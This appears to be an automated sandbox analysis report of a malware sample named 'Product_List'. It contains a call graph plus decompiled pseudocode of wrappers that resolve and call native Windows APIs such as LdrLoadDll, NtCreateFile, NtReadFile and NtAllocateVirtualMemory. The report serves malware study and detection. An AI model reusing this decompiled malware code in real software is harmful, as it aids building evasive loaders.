27134 41ee33 LdrLoadDll 27133->27134 27135 41efc9 27134->27135 27136 41ee33 LdrLoadDll 27135->27136 27137 41efd2 27136->27137 27138 41ee33 LdrLoadDll 27137->27138 27139 41efdb 27138->27139 27140 41ee33 LdrLoadDll 27139->27140 27141 41efe4 27140->27141 27142 41ee33 LdrLoadDll 27141->27142 27143 41eff0 27142->27143 27144 41ee33 LdrLoadDll 27143->27144 27145 41eff9 27144->27145 27146 41ee33 LdrLoadDll 27145->27146 27147 41f002 27146->27147 27148 41ee33 LdrLoadDll 27147->27148 27149 41f00b 27148->27149 27150 41ee33 LdrLoadDll 27149->27150 27151 41f014 27150->27151 27152 41ee33 LdrLoadDll 27151->27152 27153 41f01d 27152->27153 27154 41ee33 LdrLoadDll 27153->27154 27155 41f029 27154->27155 27156 41ee33 LdrLoadDll 27155->27156 27157 41f032 27156->27157 27158 41ee33 LdrLoadDll 27157->27158 27159 41f03b 27158->27159 27160 41ee33 LdrLoadDll 27159->27160 27161 41f044 27160->27161 27162 41ee33 LdrLoadDll 27161->27162 27163 41f04d 27162->27163 27164 41ee33 LdrLoadDll 27163->27164 27165 41f056 27164->27165 27166 41ee33 LdrLoadDll 27165->27166 27167 41f062 27166->27167 27168 41ee33 LdrLoadDll 27167->27168 27169 41f06b 27168->27169 27170 41ee33 LdrLoadDll 27169->27170 27171 41f074 27170->27171 27172 41ee33 LdrLoadDll 27171->27172 27173 41f07d 27172->27173 27174 41ee33 LdrLoadDll 27173->27174 27175 41f086 27174->27175 27176 41ee33 LdrLoadDll 27175->27176 27177 41f08f 27176->27177 27178 41ee33 LdrLoadDll 27177->27178 27179 41f09b 27178->27179 27180 41ee33 LdrLoadDll 27179->27180 27181 41f0a4 27180->27181 27182 41ee33 LdrLoadDll 27181->27182 27183 41f0ad 27182->27183 27184 41ee33 LdrLoadDll 27183->27184 27185 41f0b6 27184->27185 27186 41ee33 LdrLoadDll 27185->27186 27187 41f0bf 27186->27187 27188 41ee33 LdrLoadDll 27187->27188 27189 41f0c8 27188->27189 27190 41ee33 LdrLoadDll 27189->27190 27191 41f0d4 27190->27191 27192 41ee33 LdrLoadDll 27191->27192 27193 41f0dd 27192->27193 27194 41ee33 LdrLoadDll 27193->27194 27195 41f0e6 27194->27195 27196 41ee33 LdrLoadDll 27195->27196 27197 41f0ef 27196->27197 27198 41ee33 LdrLoadDll 27197->27198 27199 41f0f8 27198->27199 27200 41ee33 LdrLoadDll 27199->27200 27201 41f101 27200->27201 27202 41ee33 LdrLoadDll 27201->27202 27203 41f10d 27202->27203 27204 41ee33 LdrLoadDll 27203->27204 27205 41f116 27204->27205 27206 41ee33 LdrLoadDll 27205->27206 27207 41f11f 27206->27207 27207->26988 27209 41f1b3 LdrLoadDll 27208->27209 27210 41e0df 27209->27210 27240 17a9860 LdrInitializeThunk 27210->27240 27211 41e0f6 27211->26990 27213->26985 27215 41f1b3 LdrLoadDll 27214->27215 27216 41e75f NtAllocateVirtualMemory 27215->27216 27216->27084 27218 421273 27217->27218 27219 421279 27217->27219 27218->27091 27220 4201c3 2 API calls 27219->27220 27221 42129f 27220->27221 27221->27091 27223 421303 27222->27223 27224 421360 27223->27224 27225 4201c3 2 API calls 27223->27225 27224->27099 27226 42133d 27225->27226 27227 4200e3 2 API calls 27226->27227 27227->27224 27228->27096 27229->27109 27230->27111 27231->27113 27232->27116 27233->27088 27235 41ee4e 27234->27235 27236 4195b3 LdrLoadDll 27235->27236 27237 41ee6e 27236->27237 27238 4195b3 LdrLoadDll 27237->27238 27239 41ef22 27237->27239 27238->27239 27239->27133 27239->27239 27240->27211 27242 17a968f LdrInitializeThunk 27241->27242 27243 17a9681 27241->27243 27242->26994 27243->26994 27245 41e88f RtlFreeHeap 27244->27245 27246 41f1b3 LdrLoadDll 27244->27246 27245->26997 27246->27245 27248 409433 27247->27248 27249 40942e 27247->27249 27250 420063 2 API calls 27248->27250 27249->26929 27253 409458 27250->27253 27251 4094bb 27251->26929 27252 41e0c3 2 API calls 27252->27253 27253->27251 27253->27252 27254 4094c1 27253->27254 27258 420063 2 API calls 27253->27258 27263 41e7c3 27253->27263 27255 4094e7 27254->27255 27257 41e7c3 2 API calls 27254->27257 27255->26929 27259 4094d8 27257->27259 27258->27253 27259->26929 27261 409701 27260->27261 27262 41e7c3 2 API calls 27260->27262 27261->26890 27262->27261 27264 41f1b3 LdrLoadDll 27263->27264 27265 41e7df 27264->27265 27268 17a96e0 LdrInitializeThunk 27265->27268 27266 41e7f6 27266->27253 27268->27266 27270 41f846 27269->27270 27271 40cf03 LdrLoadDll 27270->27271 27272 40bdb4 27271->27272 27272->26898 27274 40d276 27273->27274 27276 40d2f0 27274->27276 27286 41de93 LdrLoadDll 27274->27286 27276->26903 27278 41e9f2 LookupPrivilegeValueW 27277->27278 27279 41f1b3 LdrLoadDll 27277->27279 27278->26908 27279->27278 27281 41e471 27280->27281 27282 41f1b3 LdrLoadDll 27281->27282 27283 41e47f 27282->27283 27287 17a9910 LdrInitializeThunk 27283->27287 27284 41e49e 27284->26909 27286->27276 27287->27284 27289 40d3fa 27288->27289 27290 40d253 LdrLoadDll 27289->27290 27291 40d45d 27290->27291 27291->26860 27293 40ff6d 27292->27293 27301 410023 27292->27301 27294 40d253 LdrLoadDll 27293->27294 27295 40ff8f 27294->27295 27302 41e143 27295->27302 27297 40ffd1 27305 41e183 27297->27305 27300 41e693 2 API calls 27300->27301 27301->26863 27301->26864 27303 41f1b3 LdrLoadDll 27302->27303 27304 41e15f 27302->27304 27303->27304 27304->27297 27306 41f1b3 LdrLoadDll 27305->27306 27307 41e19f 27306->27307 27310 17a9fe0 LdrInitializeThunk 27307->27310 27308 410017 27308->27300 27310->27308 27312 40dd8e 27311->27312 27313 40d3d3 LdrLoadDll 27312->27313 27314 40dde5 27313->27314 27347 40d053 27314->27347 27316 40de0b 27346 40e05c 27316->27346 27356 418ad3 27316->27356 27318 40de50 27318->27346 27359 40a053 27318->27359 27320 40de94 27320->27346 27381 41e703 27320->27381 27324 40deea 27325 40def1 27324->27325 27394 41e213 27324->27394 27326 4200e3 2 API calls 27325->27326 27328 40defe 27326->27328 27328->26877 27330 40df3b 27331 4200e3 2 API calls 27330->27331 27332 40df42 27331->27332 27332->26877 27333 40df4b 27334 410113 3 API calls 27333->27334 27335 40dfbf 27334->27335 27335->27325 27336 40dfca 27335->27336 27337 4200e3 2 API calls 27336->27337 27338 40dfee 27337->27338 27399 41e263 27338->27399 27341 41e213 2 API calls 27342 40e029 27341->27342 27342->27346 27404 41e023 27342->27404 27345 41e8b3 2 API calls 27345->27346 27346->26877 27348 40d060 27347->27348 27349 40d064 27347->27349 27348->27316 27350 40d07d 27349->27350 27351 40d0af 27349->27351 27409 41ded3 LdrLoadDll 27350->27409 27410 41ded3 LdrLoadDll 27351->27410 27353 40d0c0 27353->27316 27355 40d09f 27355->27316 27357 410113 3 API calls 27356->27357 27358 418af9 27356->27358 27357->27358 27358->27318 27411 40a283 27359->27411 27361 40a279 27361->27320 27362 40a071 27362->27361 27363 409423 4 API calls 27362->27363 27364 40a14f 27362->27364 27374 40a0af 27363->27374 27364->27361 27365 40a22f 27364->27365 27366 409423 4 API calls 27364->27366 27365->27361 27460 410383 10 API calls 27365->27460 27378 40a18c 27366->27378 27368 40a243 27368->27361 27461 410383 10 API calls 27368->27461 27370 40a259 27370->27361 27462 410383 10 API calls 27370->27462 27372 40a26f 27372->27320 27374->27364 27375 40a145 27374->27375 27425 409d33 27374->27425 27376 4096e3 2 API calls 27375->27376 27376->27364 27377 409d33 14 API calls 27377->27378 27378->27365 27378->27377 27379 40a225 27378->27379 27380 4096e3 2 API calls 27379->27380 27380->27365 27382 41e719 27381->27382 27383 41f1b3 LdrLoadDll 27382->27383 27384 41e71f 27383->27384 27579 17a98f0 LdrInitializeThunk 27384->27579 27385 40decb 27387 410113 27385->27387 27388 410130 27387->27388 27580 41e1c3 27388->27580 27391 410178 27391->27324 27392 41e213 2 API calls 27393 4101a1 27392->27393 27393->27324 27395 41f1b3 LdrLoadDll 27394->27395 27396 41e22f 27395->27396 27586 17a9780 LdrInitializeThunk 27396->27586 27397 40df2e 27397->27330 27397->27333 27400 41f1b3 LdrLoadDll 27399->27400 27401 41e27f 27400->27401 27587 17a97a0 LdrInitializeThunk 27401->27587 27402 40e002 27402->27341 27405 41f1b3 LdrLoadDll 27404->27405 27406 41e03f 27405->27406 27588 17a9a20 LdrInitializeThunk 27406->27588 27407 40e055 27407->27345 27409->27355 27410->27353 27412 40a2aa 27411->27412 27413 409423 4 API calls 27412->27413 27420 40a50f 27412->27420 27414 40a2fd 27413->27414 27415 4096e3 2 API calls 27414->27415 27414->27420 27416 40a38c 27415->27416 27417 409423 4 API calls 27416->27417 27416->27420 27418 40a3a1 27417->27418 27419 4096e3 2 API calls 27418->27419 27418->27420 27422 40a401 27419->27422 27420->27362 27421 409423 4 API calls 27421->27422 27422->27420 27422->27421 27423 409d33 14 API calls 27422->27423 27424 4096e3 2 API calls 27422->27424 27423->27422 27424->27422 27426 409d3e 27425->27426 27463 409d9f 27426->27463 27428 409d87 27494 41df13 27428->27494 27431 409dac 27431->27374 27432 409e2d 27527 410263 LdrLoadDll NtClose 27432->27527 27433 41e103 2 API calls 27434 409dd0 27433->27434 27434->27432 27436 409ddb 27434->27436 27443 409e59 27436->27443 27497 40e073 27436->27497 27437 409e48 27438 409e4f 27437->27438 27441 409e65 27437->27441 27440 41e693 2 API calls 27438->27440 27440->27443 27528 41df93 LdrLoadDll 27441->27528 27442 409df5 27442->27443 27517 409b63 27442->27517 27443->27374 27445 409e90 27447 40e073 5 API calls 27445->27447 27449 409eb0 27447->27449 27449->27443 27529 41dfc3 LdrLoadDll 27449->27529 27451 409ed5 27530 41e053 LdrLoadDll 27451->27530 27453 409eef 27454 41e023 2 API calls 27453->27454 27455 409efe 27454->27455 27456 41e693 2 API calls 27455->27456 27457 409f08 27456->27457 27531 409933 27457->27531 27459 409f1c 27459->27374 27460->27368 27461->27370 27462->27372 27464 409db4 27463->27464 27465 409dac 27463->27465 27466 409e2d 27464->27466 27467 41e103 2 API calls 27464->27467 27465->27428 27547 410263 LdrLoadDll NtClose 27466->27547 27468 409dd0 27467->27468 27468->27466 27470 409ddb 27468->27470 27472 409e59 27470->27472 27475 40e073 5 API calls 27470->27475 27471 409e48 27473 409e65 27471->27473 27474 409e4f 27471->27474 27472->27428 27548 41df93 LdrLoadDll 27473->27548 27476 41e693 2 API calls 27474->27476 27477 409df5 27475->27477 27476->27472 27477->27472 27480 409b63 12 API calls 27477->27480 27479 409e90 27481 40e073 5 API calls 27479->27481 27482 409e23 27480->27482 27483 409eb0 27481->27483 27482->27428 27483->27472 27549 41dfc3 LdrLoadDll 27483->27549 27485 409ed5 27550 41e053 LdrLoadDll 27485->27550 27487 409eef 27488 41e023 2 API calls 27487->27488 27489 409efe 27488->27489 27490 41e693 2 API calls 27489->27490 27491 409f08 27490->27491 27492 409933 11 API calls 27491->27492 27493 409f1c 27492->27493 27493->27428 27495 41f1b3 LdrLoadDll 27494->27495 27496 409da2 27494->27496 27495->27496 27496->27431 27496->27432 27496->27433 27498 40e0a1 27497->27498 27499 410113 3 API calls 27498->27499 27500 40e103 27499->27500 27501 40e14c 27500->27501 27502 41e213 2 API calls 27500->27502 27501->27442 27503 40e12e 27502->27503 27504 40e138 27503->27504 27507 40e158 27503->27507 27505 41e263 2 API calls 27504->27505 27506 40e142 27505->27506 27508 41e693 2 API calls 27506->27508 27509 40e1e2 27507->27509 27510 40e1c5 27507->27510 27508->27501 27512 41e263 2 API calls 27509->27512 27511 41e693 2 API calls 27510->27511 27513 40e1cf 27511->27513 27514 40e1f1 27512->27514 27513->27442 27515 41e693 2 API calls 27514->27515 27516 40e1fb 27515->27516 27516->27442 27519 409b79 27517->27519 27518 409d04 27518->27374 27519->27518 27551 409723 27519->27551 27521 409c78 27521->27518 27522 409933 11 API calls 27521->27522 27523 409ca6 27522->27523 27523->27518 27524 41e103 2 API calls 27523->27524 27525 409cdb 27524->27525 27525->27518 27526 41e703 2 API calls 27525->27526 27526->27518 27527->27437 27528->27445 27529->27451 27530->27453 27532 40995c 27531->27532 27558 409893 27532->27558 27535 41e703 2 API calls 27536 40996f 27535->27536 27536->27535 27537 4099fa 27536->27537 27539 4099f5 27536->27539 27566 4102e3 27536->27566 27537->27459 27538 41e693 2 API calls 27540 409a2d 27538->27540 27539->27538 27540->27537 27541 41df13 LdrLoadDll 27540->27541 27542 409a92 27541->27542 27542->27537 27570 41df53 27542->27570 27544 409af6 27544->27537 27545 4191a3 8 API calls 27544->27545 27546 409b4b 27545->27546 27546->27459 27547->27471 27548->27479 27549->27485 27550->27487 27552 409822 27551->27552 27554 409738 27551->27554 27552->27521 27553 4191a3 8 API calls 27556 4097a5 27553->27556 27554->27552 27554->27553 27555 4097cc 27555->27521 27556->27555 27557 4200e3 2 API calls 27556->27557 27557->27555 27559 4098ad 27558->27559 27560 40cf03 LdrLoadDll 27559->27560 27561 4098c8 27560->27561 27562 4195b3 LdrLoadDll 27561->27562 27563 4098e0 27562->27563 27564 4098fc 27563->27564 27565 4098e9 PostThreadMessageW 27563->27565 27564->27536 27565->27564 27567 4102f6 27566->27567 27573 41e093 27567->27573 27571 41f1b3 LdrLoadDll 27570->27571 27572 41df6f 27571->27572 27572->27544 27574 41e0af 27573->27574 27575 41f1b3 LdrLoadDll 27573->27575 27578 17a9840 LdrInitializeThunk 27574->27578 27575->27574 27576 410321 27576->27536 27578->27576 27579->27385 27581 41f1b3 LdrLoadDll 27580->27581 27582 41e1df 27581->27582 27585 17a99a0 LdrInitializeThunk 27582->27585 27583 410171 27583->27391 27583->27392 27585->27583 27586->27397 27587->27402 27588->27407 27591 17a9540 LdrInitializeThunk

                                                      Executed Functions

                                                      Function 0040CF03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 407 40cf03-40cf1f 408 40cf27-40cf2c 407->408 409 40cf22 call 420e83 407->409 410 40cf32-40cf40 call 4213a3 408->410 411 40cf2e-40cf31 408->411 409->408 414 40cf50-40cf61 call 41f723 410->414 415 40cf42-40cf4d call 421623 410->415 420 40cf63-40cf77 LdrLoadDll 414->420 421 40cf7a-40cf7d 414->421 415->414 420->421
                                                      C-Code - Quality: 100%
                                                      			E0040CF03(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420E83( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E004213A3(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421623( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F723(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                      0x0040cf1f
                                                      0x0040cf22
                                                      0x0040cf27
                                                      0x0040cf2c
                                                      0x0040cf36
                                                      0x0040cf3b
                                                      0x0040cf3e
                                                      0x0040cf40
                                                      0x0040cf48
                                                      0x0040cf4d
                                                      0x0040cf4d
                                                      0x0040cf54
                                                      0x0040cf5c
                                                      0x0040cf5f
                                                      0x0040cf61
                                                      0x0040cf75
                                                      0x00000000
                                                      0x0040cf77
                                                      0x0040cf7d
                                                      0x0040cf31
                                                      0x0040cf31
                                                      0x0040cf31

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF75
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 1f79ec65728361f6aacc61d0b8ee144499b1802415a85c76e63a64ecc08ce9c1
                                                      • Instruction ID: 50010c7138d93e6f9ea6e265deb9c9d9996512de15ce5229bf2c89d0c65d76ae
                                                      • Opcode Fuzzy Hash: 1f79ec65728361f6aacc61d0b8ee144499b1802415a85c76e63a64ecc08ce9c1
                                                      • Instruction Fuzzy Hash: D20152B1E4010EB7DB10DBE1DC82FDEB3789B14308F0042A6F908A7281F634EB448B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E65D Relevance: 1.5, APIs: 1, Instructions: 46filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 422 41e65d-41e661 423 41e663-41e68c call 41f1b3 422->423 424 41e62c-41e65c NtReadFile 422->424
                                                      APIs
                                                      • NtReadFile.NTDLL(004194D3,004149A1,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A1,004194D3,00000002,00000000), ref: 0041E658
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 989a99728f5d3fd41f55dbeef6ea95967e5b171b9bc780f8826328b2e2f7ccf5
                                                      • Instruction ID: 7f92864f45cf3ca67b45b990d53c327ffe0249674551ab4ccc4cabb80f823d68
                                                      • Opcode Fuzzy Hash: 989a99728f5d3fd41f55dbeef6ea95967e5b171b9bc780f8826328b2e2f7ccf5
                                                      • Instruction Fuzzy Hash: 58014B72204204BFCB14DF99DC85DD77BADEF8C350F108549FA5C8B201C634E8518BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E563 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 428 41e563-41e5b4 call 41f1b3 NtCreateFile
                                                      C-Code - Quality: 100%
                                                      			E0041E563(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                      0x0041e572
                                                      0x0041e57a
                                                      0x0041e5b0
                                                      0x0041e5b4

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5B0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                      • Instruction ID: 858a361c7fac73dd57bd9bb54302a998ea006c4b18dec6683183bae7ba4cde4d
                                                      • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                      • Instruction Fuzzy Hash: D0F06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158258BA0997241D630E8518BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E613 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 437 41e613-41e65c call 41f1b3 NtReadFile
                                                      C-Code - Quality: 25%
                                                      			E0041E613(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t14;
				signed int _t15;
				void* _t19;
				intOrPtr _t21;
				intOrPtr* _t27;

				_t14 = _a4;
				_t21 =  *((intOrPtr*)(_t14 + 0x14));
				_t3 = _t14 + 0xa74; // 0xa76
				_t27 = _t3;
				_t15 = E0041F1B3(_t21, _t14, _t27, _t21, 0, 0x2a);
				 *((intOrPtr*)(__ebx + 0x458b2c55)) =  *((intOrPtr*)(__ebx + 0x458b2c55)) + _t21;
				 *((intOrPtr*)(__ebx - 0x3b7cdbb3)) =  *((intOrPtr*)(__ebx - 0x3b7cdbb3)) - _t21;
				asm("adc al, 0x52");
				_t19 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _t21, _t15 |  *_t15); // executed
				return _t19;
			}








                                                      0x0041e616
                                                      0x0041e619
                                                      0x0041e622
                                                      0x0041e622
                                                      0x0041e62a
                                                      0x0041e62e
                                                      0x0041e634
                                                      0x0041e63a
                                                      0x0041e658
                                                      0x0041e65c

                                                      APIs
                                                      • NtReadFile.NTDLL(004194D3,004149A1,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A1,004194D3,00000002,00000000), ref: 0041E658
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                      • Instruction ID: 7e6d20b8ab43ac4c6dd8b0e9747e979c985991331e4e85b11870b547d3735a74
                                                      • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                      • Instruction Fuzzy Hash: 27F0FFB2200208ABCB04DF89DC84EEB77ADAF8C754F018208BE0DA7241C630E8118BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E743 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 440 41e743-41e780 call 41f1b3 NtAllocateVirtualMemory
                                                      C-Code - Quality: 100%
                                                      			E0041E743(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                      0x0041e75a
                                                      0x0041e77c
                                                      0x0041e780

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E77C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                      • Instruction ID: 0a6495e8f7e44f4a31df3bacb5b33776950b50f0b2a852a5fc142efbc3aec1ab
                                                      • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                      • Instruction Fuzzy Hash: B0F01EB2210208ABCB18DF89DC81EEB77ADAF88754F018119BE0897241C630F821CBF4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E68F Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041E68F(void* __eax, void* __esi, intOrPtr _a4, void* _a8) {
				long _t15;

				_t12 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t12, _t12 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t15 = NtClose(_a8); // executed
				return _t15;
			}




                                                      0x0041e696
                                                      0x0041e6aa
                                                      0x0041e6b8
                                                      0x0041e6bc

                                                      APIs
                                                      • NtClose.NTDLL(004102C8,00000000,?,004102C8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6B8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 9fc0b77864bc79e118e7065a84f160bb50efa7f73b5c36ea076cc26817774705
                                                      • Instruction ID: f9cd73a8d8550e9af34dccee213d7d49f29f51c87b206270a25c4ed3f04bde21
                                                      • Opcode Fuzzy Hash: 9fc0b77864bc79e118e7065a84f160bb50efa7f73b5c36ea076cc26817774705
                                                      • Instruction Fuzzy Hash: 4EE08C32A00314AFD710EF98CC46F973BA8DF48660F01845ABA189B242C670E9108BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E693 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041E693(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                      0x0041e6aa
                                                      0x0041e6b8
                                                      0x0041e6bc

                                                      APIs
                                                      • NtClose.NTDLL(004102C8,00000000,?,004102C8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6B8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                      • Instruction ID: 42318626d70f5b73991a76424c016a3848acfe8a2a5351ee0a56f11cd2c8e816
                                                      • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                      • Instruction Fuzzy Hash: 8FD01772604214BBD610EBA9DC89FD77BACDF48664F018469BA1C5B242C570FA108AE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c8d4a49d9bf5b91047ceb733c9513ff8f6884e3bc5679fbb0a8379be14207f15
                                                      • Instruction ID: 26bf645112633f8712980222838fc5c7e38993948d603cb5877410b854b988f9
                                                      • Opcode Fuzzy Hash: c8d4a49d9bf5b91047ceb733c9513ff8f6884e3bc5679fbb0a8379be14207f15
                                                      • Instruction Fuzzy Hash: 5F900475315000070155F5DD47447474047F7DD3D5351C031F1005550CD771DC717171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
